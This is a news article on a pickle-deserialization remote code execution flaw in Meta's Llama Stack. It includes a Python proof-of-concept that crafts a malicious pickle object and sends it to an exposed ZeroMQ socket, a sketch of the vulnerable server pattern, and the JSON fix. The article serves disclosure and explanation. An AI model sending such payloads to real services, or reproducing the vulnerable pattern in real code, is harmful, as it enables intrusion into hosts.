Meta’s Llama Framework Vulnerability Poses Remote Code Execution Threats to AI Systems

A high-severity security flaw has been disclosed in Meta's Llama large language model (LLM) framework that could allow attackers to execute arbitrary code on affected systems. Tracked as CVE-2024-50050, the vulnerability carries a CVSS score of 6.3 out of 10, although supply chain security firm Snyk has rated it critical with a score of 9.3.

The vulnerability is rooted in Llama Stack, a component that defines API interfaces for AI application development. According to Oligo Security researcher Avi Lumelsky, the flaw stems from unsafe deserialization of untrusted data. "Attackers can exploit this by sending crafted malicious objects to the socket, enabling them to execute arbitrary code," Lumelsky explained.
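
To illustrate the class of attack Lumelsky describes, here is a minimal sketch of how a malicious pickle payload could be crafted and sent to an exposed socket. The host name, port, and command are hypothetical assumptions; this is the generic unpickle-to-RCE pattern, not the actual exploit code.

```python
import os
import zmq

class MaliciousPayload:
    # pickle invokes __reduce__ when serializing; the callable it
    # returns is executed on the victim during deserialization.
    def __reduce__(self):
        return (os.system, ("id",))  # arbitrary command runs on unpickle

# Hypothetical exposed inference socket on the victim host.
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect("tcp://victim-host:5555")
sock.send_pyobj(MaliciousPayload())  # send_pyobj pickles the object
```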

The issue specifically affects the reference Python Inference API implementation, which automatically deserializes Python objects received over ZeroMQ sockets using the notoriously risky pickle format. When such a socket is exposed over the network, an attacker can send a malicious pickled object that executes arbitrary code on the host the moment it is deserialized.
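
On the receiving side, the dangerous pattern looks roughly like the following: pyzmq's recv_pyobj convenience method runs pickle deserialization on whatever bytes arrive, so anyone who can reach the socket controls what gets deserialized. This is a simplified sketch of the vulnerable pattern, not Meta's actual code.

```python
import zmq

ctx = zmq.Context()
sock = ctx.socket(zmq.REP)
sock.bind("tcp://0.0.0.0:5555")  # exposed on all network interfaces

while True:
    # recv_pyobj() unpickles incoming bytes: a crafted payload
    # executes arbitrary code here, before any validation can run.
    request = sock.recv_pyobj()
    sock.send_pyobj({"status": "ok"})
```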

Meta responded after responsible disclosure on September 24, 2024, shipping a fix in version 0.0.41 on October 10. The company switched from the pickle format to JSON for socket communication, closing the remote code execution vector.
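
The principle behind the fix can be sketched as follows: receive raw bytes and parse them as JSON, which is a pure data format and cannot trigger code execution on parse. Meta's actual implementation uses its own message types and validation; the field names and schema check below are illustrative assumptions.

```python
import json
import zmq

ctx = zmq.Context()
sock = ctx.socket(zmq.REP)
sock.bind("tcp://127.0.0.1:5555")  # bind locally rather than to all interfaces

while True:
    raw = sock.recv()  # raw bytes; nothing is deserialized implicitly
    try:
        msg = json.loads(raw)  # JSON parsing yields plain data, never code
    except (json.JSONDecodeError, UnicodeDecodeError):
        sock.send(b'{"error": "malformed request"}')
        continue
    # Illustrative schema check: reject anything but the expected shape.
    if not isinstance(msg, dict) or "prompt" not in msg:
        sock.send(b'{"error": "invalid schema"}')
        continue
    sock.send(json.dumps({"status": "ok"}).encode())
```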

The disclosure follows a string of recent security findings in AI frameworks. A separately disclosed flaw in OpenAI's ChatGPT crawler, for instance, could be abused to mount distributed denial-of-service (DDoS) attacks against arbitrary websites.

As AI technology evolves, so do the complexity and sophistication of the threats against it. Deep Instinct researcher Mark Vaitzman has noted that while AI is changing how threats are delivered, the underlying risks remain largely the same, underscoring the need for vigilant security measures across platforms.
